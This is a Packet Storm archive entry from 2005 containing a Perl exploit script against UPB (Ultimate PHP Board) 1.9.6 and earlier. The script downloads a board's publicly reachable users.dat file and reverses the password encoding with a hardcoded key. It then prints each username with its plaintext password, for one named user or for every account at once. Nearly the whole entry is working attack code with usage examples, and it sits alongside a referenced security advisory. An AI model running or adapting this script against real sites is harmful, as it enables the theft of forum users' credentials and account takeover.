UPBdecrypt.pl.txt

2005-06-18T00:00:00
ID PACKETSTORM:38054
Type packetstorm
Reporter Alberto Trivero
Modified 2005-06-18T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
#  
# Passwords Decrypter for UPB <= 1.9.6  
# Related advisory: http://www.securityfocus.com/archive/1/402461/30/0/threaded  
# Discovered and Coded by Alberto Trivero  
  
# Password file is located at: http://www.example.com/upb/db/users.dat /str0ke  
  
  
use Getopt::Std;  
use LWP::Simple;  
getopt('hfu');  
  
print "\n\t========================================\n";  
print "\t= Passwords Decrypter for UPB <= 1.9.6 =\n";  
print "\t= by Alberto Trivero =\n";  
print "\t========================================\n\n";  
  
if(!$opt_h or !($opt_f or $opt_u) or ($opt_f && $opt_u)) {  
print "Usage:\nperl $0 -h [full_target_path] [-f [output_file_name] OR -u [username]]\n\n";  
print "Examples:\nperl $0 -h http://www.example.com/upb/ -f results.txt\n";  
print "perl $0 -h http://www.example.com/upb/ -u Alby\n";  
exit(0);  
}  
  
$key="wdnyyjinffnruxezrkowkjmtqhvrxvolqqxokuofoqtneltaomowpkfvmmogbayankrnrhmbduzfmpctxiidweripxwglmwrmdscoqyijpkzqqzsuqapfkoshhrtfsssmcfzuffzsfxdwupkzvqnloubrvwzmsxjuoluhatqqyfbyfqonvaosminsxpjqebcuiqggccl";  
$page=get($opt_h."db/users.dat") || die "[-] Unable to retrieve: $!";  
print "[+] Connected to: $opt_h\n";  
@page=split(/\n/,$page);  
  
if($opt_f) {  
open(RESULTS,"+>$opt_f") || die "[-] Unable to open $opt_f: $!";  
print RESULTS "Results for $opt_h\n","="x40,"\n\n";  
for($in=0;$in<@page;$in++) {  
$page[$in]=~m/^(.*?)<~>/ && print RESULTS "Username: $1\n";  
$page[$in]=~m/^$1<~>(.*?)<~>/ && print RESULTS "Crypted Password: $1\n";  
&decrypt;  
print RESULTS "Decrypted Password: $crypt\n\n";  
$crypt="";  
}  
close(RESULTS);  
print "[+] Results printed correct in: $opt_f\n";  
}  
  
if($opt_u) {  
for($in=0;$in<@page;$in++) {  
if($page[$in]=~m/^$opt_u<~>(.*?)<~>/) {  
print "[+] Username: $opt_u\n";  
print "[+] Crypted Password: $1\n";  
&decrypt;  
print "[+] Decrypted Password: $crypt\n";  
exit(0);  
}  
}  
print "[-] Username '$opt_u' doesn't exist\n";  
}  
  
sub decrypt {  
for($i=0;$i<length($1);$i++) {  
$i_key=ord(substr($key, $i, 1));  
$i_text=ord(substr($1, $i, 1));  
$n_key=ord(substr($key, $i+1, 1));  
$i_crypt=$i_text + $n_key;  
$i_crypt-=$i_key;  
$crypt.=chr($i_crypt);  
}  
}  
  
`